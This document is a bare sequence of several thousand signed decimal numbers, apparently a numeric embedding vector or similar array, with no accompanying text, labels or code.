0.011396458372473717, 0.017415765672922134, -0.0032760407775640488, 0.016032665967941284, 0.053206995129585266, -0.021790875121951103, 0.0028614636976271868, 0.0024945188779383898, -0.028621694073081017, 0.01274427492171526, 0.03508557006716728, -0.018798863515257835, -0.030992722138762474, 0.017669804394245148, -0.04696893319487572, -0.02081706002354622, -0.036045271903276443, 0.0056417761370539665, 0.05495703965425491, 0.029101544991135597, -0.03570655360817909, 0.016667762771248817, -0.04561406001448631, 0.00800927635282278, 0.01307593658566475, -0.034577492624521255, -0.0238796379417181, 0.0037082594353705645, -0.03206533193588257, -0.054251376539468765, -0.02777489833533764, 0.036609798669815063, 0.029270904138684273, -0.05665063112974167, -0.04623504355549812, -0.001633609994314611, -0.011657553724944592, 0.03141612187027931, -0.011135363020002842, 0.0038882035296410322, -0.003838807111606002, 0.008806675672531128, 0.025530889630317688, 0.009434714913368225, 0.0009482347522862256, 0.01403563842177391, 0.037146102637052536, 0.007607047911733389, 0.04445677250623703, -0.033533111214637756, -0.014974170364439487, -0.018784750252962112, 0.017175840213894844, -0.00988633930683136, 0.0048267352394759655, -0.024768773466348648, 0.005666474346071482, 0.0017059404635801911, 0.01877063699066639, -0.016131458804011345, 0.01702059432864189, -0.009194789454340935, -0.018177879974246025, -0.011996272020041943, -0.015905646607279778, 0.028240635991096497, -0.012589029036462307, -0.012850124388933182, 0.003553013550117612, -0.014388469979166985, 0.032855674624443054, 0.020040830597281456, -0.009533507749438286, 0.011946875602006912, 0.010853097774088383, 0.02011139690876007, 0.024952245876193047, -0.034718625247478485, 0.008841958828270435, 0.007529424969106913, -0.012567859143018723, 0.020647700875997543, -0.025996627286076546, -0.02053479477763176, 0.0033713052980601788, 0.04217042401432991, -0.020238416269421577, -0.035339608788490295, -0.001905290293507278, 0.00843267422169447, -0.02687164954841137, -0.03313793987035751, 0.025290964171290398, -0.0346057191491127, -0.0030925683677196503, -0.010500266216695309, 0.002667406341060996, -0.007578821387141943, 0.006474458612501621, 0.011396458372473717, 0.005804078653454781, -0.027055121958255768, 0.0022828199435025454, 0.01407797820866108, 0.03006124682724476, -0.042622048407793045, -0.01716172695159912, 0.023032842203974724, 0.03827516362071037, 0.004272790160030127, 0.04106958955526352, 0.010535549372434616, -0.03892437368631363, 0.03466217219829559, -0.01838957890868187, -0.02426069602370262, 0.01925048790872097, 0.01881297677755356, 0.003768240800127387, -0.0017332849092781544, -0.008263315074145794, -0.008594976738095284, -0.010020415298640728, -0.002843822119757533, -0.05371507257223129, -0.02630711905658245, 0.004378639627248049, 0.025432096794247627, 0.012518462724983692, -0.055916741490364075, -0.003648278070613742, -0.02544621005654335, -0.002319867257028818, -0.021085212007164955, 0.008362107910215855, 0.009773433208465576, -0.006044004112482071, -0.040194567292928696, -0.004085789434611797, -0.029327357187867165, -0.05447718873620033, -0.011530534364283085, 0.011777516454458237, -0.005094887223094702, 0.0014219110598787665, 0.016752442345023155, -0.012215027585625648, -0.004346884787082672, 0.0032125310972332954, -0.007508255075663328, -0.041097816079854965, 0.0070001776330173016, 0.007621161174029112, 0.021141665056347847, -0.02548854984343052, 0.025079265236854553, -0.03260163590312004, 0.023315107449889183, -0.03310971334576607, 0.041521213948726654, 0.03322261944413185, -0.003729429328814149, -0.015242322348058224, -0.021240457892417908, 0.04025102034211159, -0.030033020302653313, 0.018036749213933945, 0.022242499515414238, -0.012426726520061493, -0.009399431757628918, 0.013668693602085114, -0.0010920136701315641, -0.0005318935727700591, -0.0185307115316391, 0.006379194092005491, -0.016131458804011345, -0.022849369794130325, 0.018474258482456207, 0.0212969109416008, 0.00931475218385458, 0.018558938056230545, 0.0011899243108928204, 0.018022635951638222, 0.027506746351718903, 0.005204265005886555, -0.00950528122484684, -0.04101313650608063, -0.029807208105921745, 0.013626353815197945, -0.002695632865652442, -0.024387715384364128, -0.02592606097459793, 0.04437209293246269, -0.0059946076944470406, -0.0015621616039425135, -0.07084857672452927, 0.04482371732592583, 0.028480561450123787, 0.004269261844456196, -0.010542606003582478, -0.05340458080172539, 0.019659772515296936, 0.0031454931013286114, -0.020520681515336037, 0.008983091451227665, -0.06949370354413986, -0.014762471430003643, -0.007211876567453146, -0.015214095823466778, -0.020760606974363327, -0.01577862724661827, 0.0037894106935709715, 0.04039215296506882, 0.007451802026480436, -0.02021018974483013, -0.027464406564831734, -0.015242322348058224, 0.021226344630122185, 0.030004793778061867, 0.012610198929905891, 0.019786791875958443, 0.01460722554475069, -0.011946875602006912, -0.029863661155104637, -0.01374631654471159, -0.009187732823193073, -0.02478288672864437, 0.04360997676849365, -0.012617255561053753, -0.008707882836461067, -0.010203887708485126, 0.026462364941835403, -0.0021434517111629248, 0.009709923528134823, 0.012800727970898151, 0.04403337463736534, -0.016978254541754723, 0.017288746312260628, -0.0019934982992708683, 0.014621338807046413, -0.031105628237128258, 0.01174928992986679, 0.030569324269890785, 0.008651429787278175, -0.01929282769560814, -0.0008622320601716638, 0.0010408530943095684, 0.024190129712224007, -0.013562844134867191, -0.036609798669815063, -0.001815318246372044, 0.009498224593698978, 0.009900452569127083, -0.007451802026480436, 0.014233224093914032, -0.004512715619057417, -0.017641577869653702, -0.005253661423921585, 0.0041916389018297195, -0.012779558077454567, -0.0012922454625368118, 0.030710456892848015, -0.04225510358810425, 0.02915799804031849, 0.010288567282259464, -0.009230072610080242, 0.012045668438076973, -0.023696165531873703, -0.025220397859811783, 0.008658486418426037, -0.010824871249496937, -0.01002747192978859, 0.007155423518270254, -0.010330907069146633, 0.042480915784835815, -0.01762746460735798, -0.008496183902025223, 0.016314931213855743, 0.003630636492744088, -0.05461832135915756, 0.017980296164751053, 0.006319212727248669, 0.013562844134867191, -0.03889614716172218, 0.0008613499812781811, 0.009681697003543377, 0.00224048038944602, -0.010196831077337265, 0.01102951355278492, -0.0005067543243058026, -0.01624436490237713, -0.0008106304449029267, 0.036017045378685, -0.010472039692103863, 0.01088838092982769, 0.0025156887713819742, 0.012723105028271675, -0.035283155739307404, -0.023569146171212196, 0.025855494663119316, 0.022425971925258636, -0.008263315074145794, 0.0022034330759197474, 0.0484931655228138, 0.009907509200274944, 0.02354091964662075, 0.02577081508934498, -0.00810101255774498, -0.008778449147939682, -0.009441771544516087, -0.027224481105804443, 0.01045792642980814, -0.007501198444515467, 0.019927924498915672, 0.0180085226893425, -0.03186774626374245, -0.0075858780182898045, -0.025516776368021965, -0.01702059432864189, 0.00723304646089673, -0.019546866416931152, -0.003835278796032071, -0.0068237618543207645, -0.027760785073041916, -0.01503062341362238, 0.020831173285841942, -0.025460323318839073, -0.0346057191491127, -0.01877063699066639, 0.023569146171212196, 0.018474258482456207, 0.026532931253314018, -0.0027079819701611996, -0.025799041613936424, -0.00780463358387351, 0.014162657782435417, -0.02363971248269081, -0.012864237651228905, -0.021466270089149475, 0.011149476282298565, -0.012638425454497337, -0.008460900746285915, 0.014346130192279816, 0.04688425362110138, -0.01814965344965458, -0.003807052271440625, 0.026561157777905464, 0.012342046946287155, 0.011664610356092453, -0.012659595347940922, 0.038952600210905075, 0.03539606183767319, -0.014903604052960873, -0.014875377528369427, -0.02725270763039589, -0.028043050318956375, -0.005885229911655188, 0.019137581810355186, 0.03127498924732208, -0.000571587064769119, -0.04121072217822075, 0.019476300105452538, 0.011467024683952332, 0.019546866416931152, 0.004322186578065157, -0.025178058072924614, 0.0023463296238332987, -0.0028896902222186327, -0.01987147144973278, -0.02468409389257431, -0.005126642063260078, -0.00409990269690752, -0.030766909942030907, 0.013259408995509148, -0.009131279774010181, 0.008164522238075733, 0.0006425944156944752, 0.01174223329871893, 0.014106204733252525, 0.004198695532977581, -0.011594044044613838, 0.014381413348019123, 0.008093955926597118, -0.004495074041187763, 0.02592606097459793, 0.01241261325776577, 0.04160589352250099, 0.019518639892339706, 0.021184004843235016, -0.001988205825909972, 0.01754278503358364, 0.025079265236854553, -0.025361530482769012, -0.03689206391572952, 0.004068147856742144, 0.007635274436324835, -0.009653470478951931, 0.01848837174475193, 0.025178058072924614, 0.04284786060452461, 0.005077245645225048, -0.006608534604310989, 0.022425971925258636, 0.027661992236971855, -0.001443080953322351, 0.007317726034671068, -0.01682300865650177, 0.01634315773844719, 0.015425794757902622, -0.030964495614171028, 0.006255703046917915, 0.021000532433390617, 0.003810580587014556, 0.015425794757902622, -0.017980296164751053, -0.018403692170977592, -0.04784395545721054, -0.021212231367826462, 0.0019811491947621107, -0.02601074054837227, -0.01829078607261181, 0.016893574967980385, -0.003087275894358754, 0.008037502877414227, -0.028466448187828064, -0.036525119096040726, 0.014310847036540508, 0.002224602969363332, -0.03751304745674133, 0.015750400722026825, -0.017373425886034966, -0.009307695552706718, -0.0050313775427639484, 0.014092091470956802, 0.008108069188892841, 0.018177879974246025, 0.0029884830582886934, -0.037004970014095306, 0.017810937017202377, 0.000028198957807035185, -0.029807208105921745, -0.007268329616636038, -0.032375823706388474, 0.032714542001485825, 0.017952069640159607, 0.0004564757982734591, 0.014219110831618309, 0.002619774080812931, -0.025220397859811783, 0.006537968292832375, 0.019998490810394287, -0.013816882856190205, 0.004484489094465971, -0.001316943671554327, -0.0018805920844897628, 0.016964141279459, -0.012144461274147034, 0.015736287459731102, -0.006739082280546427, -0.015693947672843933, 0.03827516362071037, -0.03525492921471596, 0.006410948932170868, 0.014423753134906292, 0.009949848987162113, -0.014776584692299366, 0.014310847036540508, 0.012659595347940922, 0.030569324269890785, -0.01724640652537346, -0.011523477733135223, 0.030569324269890785, 0.007797576952725649, 0.009738150052726269, -0.02416190318763256, 0.00858086347579956, 0.005239548161625862, 0.02845233492553234, 0.0016415487043559551, 0.017189953476190567, 0.005853475071489811, -0.04349707067012787, 0.0005632073734886944, 0.015185869298875332, -0.03248872980475426, -0.025855494663119316, 0.028762826696038246, 0.012327933683991432, 0.01778271049261093, -0.03658157214522362, -0.03954535722732544, 0.026434138417243958, -0.01606089249253273, -0.03720255568623543, 0.004766753874719143, 0.006156910210847855, -0.01488949079066515, 0.00010888160613831133, -0.00011467024887679145, -0.02325865440070629, -0.013068879954516888, -0.025855494663119316, -0.024472394958138466, 0.010592002421617508, -0.0013345852494239807, -0.002619774080812931, -0.020704153925180435, -0.030315285548567772, 0.016286704689264297, -0.013090049847960472, 0.008517353795468807, -0.003958770073950291, 0.02287759631872177, 0.0019211677135899663, -0.006534439977258444, -0.00891252513974905, 0.010930720716714859, -0.008919581770896912, 0.011064796708524227, -0.0030802192632108927, 0.03824693709611893, 0.006262759678065777, 0.025051038712263107, 0.018234333023428917, -0.02616598643362522, -0.00922301597893238, -0.015849193558096886, 0.0029073318000882864, -0.048775430768728256, 0.018756523728370667, 0.015383454971015453, 0.030512871220707893, -0.02462764084339142, 0.028127729892730713, 0.00751531170681119, -0.013146502897143364, 0.01615968532860279, -0.006188665051013231, -0.010634342208504677, -0.0096958102658391, -0.02311752177774906, -0.008792562410235405, 0.007169536780565977, -0.023272767663002014, 0.03310971334576607, 0.03725900873541832, 0.019560979679226875, 0.04702538624405861, -0.023456240072846413, -0.00195468682795763, -0.00011874986375914887, 0.009300638921558857, 0.001022329437546432, -0.019687999039888382, 0.023413900285959244, 0.01102951355278492, -0.005542983300983906, -0.042480915784835815, 0.01088838092982769, 0.004413922782987356, -0.005624134559184313, -0.04758991673588753, -0.028099503368139267, -0.01934928074479103, -0.019137581810355186, -0.0024874622467905283, 0.018191993236541748, 0.02049245499074459, -0.012003328651189804, 0.0014245572965592146, 0.005052547436207533, -0.00858086347579956, 0.013104163110256195, 0.00829154159873724, 0.013118276372551918, 0.048436712473630905, -0.02759142592549324, -0.01738753914833069, 0.027958370745182037, -0.014063864946365356, 0.02963784895837307, -0.009342978708446026, -0.019335167482495308, -0.004625621251761913, -0.006774365436285734, -0.006576779764145613, -0.019335167482495308, -0.030569324269890785, 0.019321054220199585, 0.017514558508992195, -0.016004439443349838, -0.008990148082375526, -0.006114570423960686, -0.018784750252962112, -0.012716048397123814, -0.018925882875919342, 0.014212054200470448, -0.04250914230942726, -0.023075181990861893, 0.010930720716714859, 0.049622226506471634, -0.009307695552706718, -0.0032548708841204643, 0.008594976738095284, 0.03406941518187523, 0.013329975306987762, -0.01829078607261181, -0.019617432728409767, 0.010606115683913231, 0.0003980380715802312, -0.042819634079933167, -0.0037047311197966337, 0.022242499515414238, 0.04298899322748184, 0.004929056391119957, -0.009131279774010181, -0.018516598269343376, -0.00905365776270628, -0.0006699388613924384, -0.0067567238584160805, -0.023032842203974724, 0.0003993611899204552, -0.017853276804089546, 0.027478519827127457, -0.008397391065955162, -0.002819123910740018, -0.0018347239820286632, -0.02448650822043419, 0.018544824793934822, -0.011354118585586548, -0.016089119017124176, -0.02582726813852787, -0.02334333397448063, -0.04547292739152908, -0.0028738128021359444, -0.0016115580219775438, 0.018897656351327896, 0.0005102826398797333, -0.003404824296012521, 0.021367477253079414, 0.01303359679877758, -0.014339073561131954, 0.006209834944456816, 0.020901739597320557, -0.018036749213933945, -0.019137581810355186, -0.01322412583976984, -0.013358201831579208, -0.004629149567335844, 0.0297789815813303, -0.016032665967941284, 0.004911414813250303, -0.032291144132614136, 0.026645837351679802, 0.011516421101987362, 0.009893395937979221, 0.006590893026441336, -0.007868143729865551, 0.010394416749477386, 0.009145393036305904, -0.03906550630927086, 0.0008326824172399938, -0.021240457892417908, -0.014233224093914032, -0.016032665967941284, 0.03344843164086342, 0.02396431751549244, -0.01117064617574215, -0.03692029044032097, 0.015835080295801163, 0.0055606248788535595, -0.03198065236210823, -0.005063132382929325, -0.009279469028115273, -0.004156355746090412, -0.01407797820866108, 0.01744399219751358, -0.005857003387063742, 0.0167806688696146, -0.028706373646855354, 0.0034418716095387936, 0.014247337356209755, -0.029863661155104637, 0.001081428723409772, -0.00974520668387413, 0.0038811468984931707, 0.015764513984322548, -0.015341115184128284, -0.011777516454458237, 0.002125810133293271, -0.010592002421617508, 0.010958947241306305, -0.01901056244969368, -0.021085212007164955, -0.02759142592549324, -0.007282442878931761, 0.03446458652615547, 0.007677614223212004, -0.01944807358086109, 0.0007674085791222751, 0.022510651499032974, -0.008002219721674919, -0.028325315564870834, -0.006350967567414045, -0.0242465827614069, 0.006813176907598972, 0.04956577345728874, -0.0012851888313889503, 0.03570655360817909, 0.007691727485507727, -0.012821897864341736, 0.04665844142436981, 0.024133676663041115, 0.026222439482808113, -0.01848837174475193, -0.026702290400862694, -0.006799063645303249, -0.0052783596329391, 0.005952267907559872, 0.024472394958138466, -0.007031932473182678, -0.0026127174496650696, 0.014776584692299366, 0.03130321577191353, 0.011205929331481457, 0.0030802192632108927, -0.013958015479147434, 0.009060713462531567, -0.00465737609192729, -0.015933873131871223, 0.007973993197083473, -0.02548854984343052, -0.017288746312260628, 0.018643617630004883, 0.05755387991666794, -0.0016071476275101304, -0.002305753994733095, -0.008136295713484287, -0.014480206184089184, 0.003471862291917205, 0.004075204487890005, -0.0016565440455451608, 0.012871294282376766, -0.032291144132614136, 0.006396835669875145, -0.015976212918758392, 0.04922705516219139, -0.005909928120672703, 0.013675750233232975, -0.006365080829709768, -0.007854030467569828, -0.014833037741482258, -0.012384386733174324, 0.020069057121872902, 0.0003528315282892436, -0.004734999034553766, 0.0037047311197966337, -0.027478519827127457, -0.015214095823466778, -0.006273344624787569, -0.00387761858291924, -0.0008591447840444744, 0.004530356731265783, 0.007388292346149683, 0.0013178257504478097, 0.007790520321577787, -0.014833037741482258, 0.0077622937969863415, 0.024331262335181236, -0.019956151023507118, -0.0036553347017616034, 0.011706950142979622, 0.0014589583734050393, -0.009639357216656208, 0.0008935458608902991, 0.014381413348019123, -0.018121426925063133, 0.009533507749438286, -0.02396431751549244, -0.011996272020041943, 0.010013358667492867, -0.013541674241423607, 0.017698030918836594, -0.008686712943017483, -0.01488949079066515, -0.004974924493581057, -0.018022635951638222, -0.018502485007047653, 0.0011246505891904235, 0.01572217419743538, 0.020478341728448868, 0.09088940173387527, -0.010253284126520157, 0.013231182470917702, 0.00011378816998330876, -0.02386552467942238, 0.011262382380664349, 0.024048997089266777, -0.0034506923984736204, 0.025897834450006485, -0.02396431751549244, 0.02311752177774906, 0.027323273941874504, -0.00224048038944602, -0.00127195764798671, 0.015736287459731102, 0.04132362827658653, -0.0335613377392292, -0.011255325749516487, 0.029863661155104637, -0.0034665698185563087, 0.010154491290450096, 0.004950226284563541, 0.010690795257687569, 0.002097583608701825, 0.033053260296583176, 0.0035283153411000967, -0.005246604792773724, -0.020139623433351517, -0.03864210844039917, -0.00959701742976904, -0.0025403869803994894, 0.014550772495567799, 0.0013689863262698054, -0.02625066600739956, 0.00756470812484622, 0.014437866397202015, 0.01284306775778532, 0.01744399219751358, -0.016329044476151466, -0.0322064645588398, -0.007113083731383085, -0.02225661277770996, -0.010923664085566998, 0.009540564380586147, -0.014402583241462708, -0.00824214518070221, -0.0071907066740095615, -0.01886942982673645, -0.036525119096040726, 0.016597196459770203, -0.03677915781736374, -0.011149476282298565, 0.013337031938135624, 0.009808716364204884, -0.005687644239515066, 0.02801482379436493, -0.024557074531912804, -0.009103053249418736, -0.007360065821558237, 0.013132389634847641, 0.012864237651228905, 0.02077472023665905, -0.012899520806968212, -0.012052725069224834, 0.02602485381066799, 0.007345952559262514, -0.03198065236210823, 0.00922301597893238, -0.0010408530943095684, 0.024768773466348648, 0.0002844704140443355, 0.009392375126481056, -0.01662542298436165, -0.0007819628808647394, -0.005306586157530546, -0.0067284973338246346, -0.015298775397241116, 0.008235088549554348, -0.027859577909111977, -0.028325315564870834, 0.006774365436285734, 0.006827290169894695, -0.007691727485507727, 0.021833214908838272, -0.008072786033153534, 0.04298899322748184, -0.008376221172511578, 0.0023921977262943983, 0.011382345110177994, -0.0026832837611436844, -0.01906701549887657, -0.0005954031948931515, 0.011071853339672089, 0.00022823789913672954, 0.020831173285841942, 0.033053260296583176, 0.011241212487220764, -0.007180121727287769, -0.03212178498506546, -0.024514734745025635, 0.011445854790508747, 0.02524862438440323, 0.009999245405197144, 0.0031701913103461266, -0.004265733528882265, 0.021593289449810982, -0.009963962249457836, 0.0021381592378020287, 0.0038564486894756556, -0.0061039854772388935, -0.010330907069146633, -0.0050843022763729095, 0.01720406673848629, -0.012567859143018723, -0.007240103092044592, 0.009674640372395515, -0.009187732823193073, -0.005013735964894295, -0.02181910164654255, -0.025615569204092026, -0.010817814618349075, 0.009251242503523827, 0.026758743450045586, -0.013725146651268005, -0.003662391332909465, 0.004819678608328104, 0.03192419931292534, -0.026575271040201187, 0.011706950142979622, 0.005902871489524841, 0.0031313798390328884, 0.011234155856072903, 0.0071236686781048775, 0.0003834837698377669, 0.007642331067472696, -0.026137759909033775, 0.025700248777866364, 0.0124620096758008, 0.008602033369243145, 0.009032487869262695, -0.010902494192123413, 0.007543538231402636, 0.0012710755690932274, 0.013499334454536438, -0.007712897378951311, -0.012349103577435017, 0.009378261864185333, -0.0025403869803994894, 0.014564885757863522, -0.00002963233600894455, 0.017119387164711952, -0.01222208421677351, 0.005729984026402235, 0.013421711511909962, 0.022073140367865562, -0.00675319554284215, 0.024980472400784492, -0.00742357550188899, 0.0014704253990203142, 0.022708237171173096, 0.009780489839613438, 0.007345952559262514, -0.0012922454625368118, -0.014162657782435417, 0.009357091970741749, 0.040335699915885925, -0.019306940957903862, -0.01355578750371933, -0.009032487869262695, 0.0018700071377679706, 0.0297789815813303, -0.0013945666141808033, -0.009025431238114834, -0.02244008518755436, 0.003261927515268326, 0.02997656725347042, 0.0038141089025884867, -0.014480206184089184, 0.014635452069342136, -0.007811690215021372, 0.0021134610287845135, -0.014677791856229305, 0.013661636970937252, -0.007472971919924021, 0.0018117899307981133, 0.006820233538746834, 0.0019317526603117585, 0.013266465626657009, -0.05069483444094658, 0.024895792827010155, 0.011862196028232574, 0.006597949657589197, -0.018191993236541748, -0.005408907309174538, 0.029412036761641502, -0.029186224564909935, -0.002206961391493678, -0.03073868341743946, 0.0013733967207372189, -0.022835256531834602, -0.026420025154948235, -0.03322261944413185, 0.007130725309252739, 0.014762471430003643, -0.004325714893639088, -0.03782353922724724, -0.015976212918758392, -0.005447718780487776, 0.005334812682121992, 0.003261927515268326, -0.0011396458139643073, 0.0006972833070904016, 0.008750222623348236, 0.0004723532183561474, 0.046489082276821136, -0.002404546830803156, -0.028819279745221138, -0.021692082285881042, 0.0009200082276947796, -0.02268001064658165, -0.0000869950235937722, 0.01882709003984928, -0.008475014008581638, 0.005500643514096737, -0.0242465827614069, 0.002633887343108654, 0.01716172695159912, -0.02458530105650425, 0.008983091451227665, 0.004523300565779209, -0.02225661277770996, 0.0012710755690932274, 0.007084857206791639, 0.006640289444476366, -0.012708991765975952, -0.003553013550117612, 0.009773433208465576, 0.014085034839808941, -0.00247158482670784, 0.0008295951411128044, 0.0015533408150076866, -0.0014810103457421064, -0.0038599770050495863, 0.003644749755039811, 0.007952823303639889, -0.0002423511614324525, 0.0075576514936983585, 0.01303359679877758, -0.01388744916766882, 0.003743542591109872, -0.002690340392291546, -0.0023269238881766796, -0.004269261844456196, -0.019024675711989403, -0.0002692545822355896, -0.008228031918406487, 0.0034259941894561052, -0.00781874731183052, -0.014804811216890812, -0.007501198444515467, 0.043807562440633774, -0.03164193406701088, 0.009999245405197144, 0.019462186843156815, -0.0075858780182898045, 0.026984555646777153, -0.013294692151248455, -0.00703898910433054, 0.006813176907598972, 0.02753497287631035, -0.0018664788221940398, 0.008235088549554348, -0.0023445654660463333, -0.024655867367982864, 0.007973993197083473, 0.004389224573969841, -0.004375111311674118, -0.00921595934778452, -0.023173974826931953, 0.00862320326268673, -0.01901056244969368, 0.01838957890868187, 0.028028937056660652, -0.028664033859968185, 0.001745634013786912, -0.01706293411552906, -0.03855742886662483, 0.006887271534651518, -0.0057652671821415424, -0.002035838086158037, 0.005341869313269854, -0.013435824774205685, 0.002766199177131057, -0.0370614230632782, 0.01702059432864189, -0.010020415298640728, -0.02095819264650345, 0.02468409389257431, -0.0031137382611632347, 0.016907688230276108, 0.006880214903503656, 0.00378235406242311, 0.006160438526421785, -0.01606089249253273, 0.008510297164320946, -0.007684670854359865, -0.013322918675839901, -0.004484489094465971, -0.002880869433283806, -0.00018810330948326737, -0.012638425454497337, 0.0009261827799491584, -0.04030747339129448, 0.0003993611899204552, 0.00983694288879633, -0.010253284126520157, -0.04273495450615883, 0.008030446246266365, -0.025135718286037445, -0.0010496738832443953, -0.0006686157430522144, -0.015199982561171055, -0.014550772495567799, -0.002572141820564866, -0.016766555607318878, -0.0010320323053747416, -0.0023498579394072294, -0.009498224593698978, -0.010528492741286755, -0.016978254541754723, 0.03934777155518532, 0.012730161659419537, 0.027041008695960045, -0.008856072090566158, -0.00881373230367899, 0.026420025154948235, 0.014536659233272076, -0.003006124636158347, 0.00723304646089673, 0.010563775897026062, -0.0571022555232048, 0.03203710541129112, -0.0014280856121331453, 0.020365435630083084, 0.026420025154948235, 0.0044633192010223866, 0.010824871249496937, 0.003979939967393875, 0.008905468508601189, -0.022454198449850082, -0.026603497564792633, -0.007522368337959051, -0.0063086277805268764, 0.0054794736206531525, 0.0017156433314085007, 0.015101189725100994, 0.007945766672492027, 0.022891709581017494, 0.000093004186055623, -0.028127729892730713, 0.0009067770442925394, -0.010726078413426876, -0.008778449147939682, 0.0028843977488577366, 0.007240103092044592, -0.024514734745025635, -0.009829886257648468, 0.024034883826971054, 0.005821720231324434, -0.004255148582160473, 0.013668693602085114, -0.013591070659458637, 0.020718267187476158, -0.004699715878814459, -0.013379371725022793, 0.003396003507077694, 0.029101544991135597, -0.020944079384207726, -0.017853276804089546, 0.04265027493238449, -0.005662946030497551, 0.004226922057569027, -0.00405050627887249, -0.010606115683913231, -0.01716172695159912, 0.0003548162057995796, -0.01498828362673521, -0.0010267398320138454, -0.00877139251679182, -0.019095242023468018, 0.029722528532147408, 0.024557074531912804, 0.013146502897143364, 0.03039996512234211, -0.014494319446384907, -0.0038458637427538633, -0.017034707590937614, 0.005920513067394495, -0.030145926401019096, -0.015482247807085514, -0.004742055665701628, -0.021847328171133995, -0.006664987653493881, 0.01692180149257183, -0.01265253871679306, 0.012384386733174324, -0.02368205226957798, -0.03175484016537666, 0.028325315564870834, -0.02530507743358612, 0.006735553964972496, 0.012948917225003242, -0.01658308319747448, -0.02430303581058979, -0.011382345110177994, -0.0005746743408963084, -0.005094887223094702, 0.02540387026965618, 0.023611485958099365, -0.020167849957942963, 0.015581040643155575, -0.005740568973124027, -0.024613527581095695, -0.026504704728722572, -0.01088838092982769, -0.021127551794052124, 0.001717407489195466, 0.0019088186090812087, -0.01174223329871893, 0.0000289432118734112, -0.014903604052960873, -0.004519772250205278, 0.009350035339593887, -0.015214095823466778, 0.03316616639494896, -0.006259231362491846, -0.003715316066518426, -0.020718267187476158, -0.00424103531986475, 0.008827845565974712, 0.01929282769560814, 0.007501198444515467, -0.0008115125237964094, -0.015199982561171055, 0.001952922553755343, 0.005804078653454781, -0.01488949079066515, -0.008990148082375526, -0.017980296164751053, -0.01232087705284357, 0.014233224093914032, -0.009342978708446026, 0.012179744429886341, 0.020421888679265976, -0.008990148082375526, -0.014536659233272076, 0.0062662879936397076, 0.01686534844338894, -0.0017138791736215353, 0.009709923528134823, 0.026913989335298538, 0.002799718175083399, 0.017613351345062256, -0.014734244905412197, 0.016004439443349838, 0.005186623428016901, 0.00599107937887311, 0.0014245572965592146, -0.02077472023665905, -0.003796467324718833, 0.018304899334907532, -0.0047314707189798355, 0.015298775397241116, -0.0035988816525787115, 0.011424684897065163, -0.00613574031740427, -0.018841203302145004, -0.013958015479147434, 0.00680259196087718, 0.014204997569322586, -0.006322741042822599, 0.023950204253196716, -0.0005102826398797333, 0.02081706002354622, -0.010337963700294495, -0.0057229273952543736, 0.003286625724285841, -0.005461832042783499, 0.020181963220238686, -0.01977267861366272, -0.0031419647857546806, -0.011608157306909561, 0.004054034594446421, -0.00680259196087718, 0.010923664085566998, 0.0020181965082883835, 0.01412737462669611, 0.011714006774127483, 0.010288567282259464, -0.005190151743590832, -0.007938710041344166, -0.01882709003984928, 0.00761410454288125, -0.013965072110295296, 0.006167495157569647, 0.011347061954438686, -0.020224303007125854, 0.008489127270877361, 0.010288567282259464, -0.010676681995391846, 0.008940751664340496, -0.02095819264650345, -0.004957282915711403, 0.004128129221498966, -0.0038458637427538633, -0.009392375126481056, 0.003090804209932685, -0.002210489707067609, -0.01734519936144352, 0.0014704253990203142, 0.0013751608785241842, -0.005691172555088997, 0.0192081481218338, -0.015990326181054115, -0.014818924479186535, -0.002295169048011303, 0.03344843164086342, 0.0003312205953989178, 0.002558028558269143, -0.029468489810824394, 0.0021081685554236174, 0.0035283153411000967, -0.010034528560936451, -0.011481137946248055, 0.01668187603354454, -0.01398624200373888, 0.03765418007969856, -0.020718267187476158, -0.0022422445472329855, -0.0037082594353705645, 0.002058772137388587, 0.0005658536101691425, -0.005158396903425455, 0.01498828362673521, -0.005550039932131767, -0.0030043604783713818, 0.01973033882677555, -0.007529424969106913, -0.010930720716714859, -0.008178635500371456, 0.014261450618505478, -0.01512941624969244, 0.00387761858291924, -0.0064850435592234135, -0.00285264290869236, -0.00040972561691887677, -0.02091585285961628, -0.003549485234543681, 0.016879461705684662, 0.01776859723031521, -0.0015630436828359962, 0.01886942982673645, 0.015256435610353947, 0.020224303007125854, 0.011015400290489197, 0.02753497287631035, -0.00713425362482667, -0.016385497525334358, 0.007875200361013412, -0.012497292831540108, 0.015524587593972683, 0.01069785188883543, -0.005578266456723213, 0.019321054220199585, -0.0070954421535134315, 0.00044500877265818417, 0.03231937065720558, -0.0062804012559354305, 0.002600368345156312, 0.0041104876436293125, 0.02544621005654335, 0.007169536780565977, 0.0009429422789253294, -0.0115093644708395, 0.002743265125900507, -0.013160616159439087, 0.009081883355975151, -0.017641577869653702, -0.008545580320060253, 0.013598127290606499, 0.01232087705284357, 0.004572696518152952, -0.03454926609992981, 0.02616598643362522, -0.014522545970976353, -0.018191993236541748, -0.0161032322794199, -0.01738753914833069, 0.0027891332283616066, 0.008037502877414227, 0.01672421582043171, 0.016752442345023155, 0.002101111924275756, -0.005426548887044191, -0.0046362061984837055, -0.009752263315021992, 0.011488194577395916, -0.007846973836421967, 0.016667762771248817, -0.009180676192045212, 0.006121627055108547, 0.014042695052921772, -0.004960811231285334, -0.008065729402005672, -0.013520504347980022, 0.0027273877058178186, -0.003891731845214963, -0.008347994647920132, -0.014621338807046413, -0.01141057163476944, 0.010323850437998772, -0.015933873131871223, 0.02296227589249611, -0.008376221172511578, 0.01126943901181221, 0.004244563635438681, -0.0021910839714109898, -0.01953275315463543, -0.00023882284585852176, 0.014346130192279816, 0.02244008518755436, -0.0012534339912235737, -0.0054653603583574295, -0.0025827267672866583, -0.013188842684030533, 0.03059755079448223, -0.010563775897026062, 0.005493586882948875, -0.010994230397045612, -0.007074272260069847, -0.013619297184050083, -0.002776784123852849, -0.02029486931860447, -0.0016142042586579919, -0.011008343659341335, 0.0065520815551280975, -0.0002540387213230133, -0.004646791145205498, 0.018756523728370667, 0.032291144132614136, -0.008446787483990192, 0.009766376577317715, -0.015665721148252487, 0.002101111924275756, 0.011848082765936852, -0.01078958809375763, -0.005045490805059671, -0.002519217086955905, 0.013351145200431347, 0.004428036045283079, 0.019038788974285126, 0.009921622462570667, -0.008637316524982452, 0.012553745880723, 0.0014536659000441432, -0.006171023473143578, -0.011996272020041943, 0.001414854428730905, 0.008757279254496098, 0.015256435610353947, 0.005091358907520771, 0.0009958670707419515, -0.015947986394166946, -0.009724036790430546, -0.022623557597398758, -0.012927747331559658, 0.006760252173990011, -0.002896746853366494, -0.0002463205310050398, 0.006682629231363535, -0.024909906089305878, -0.004022279754281044, 0.0045550549402832985, 0.005666474346071482, -0.014945943839848042, -0.0009993953863158822, -0.004216337110847235, -0.006396835669875145, 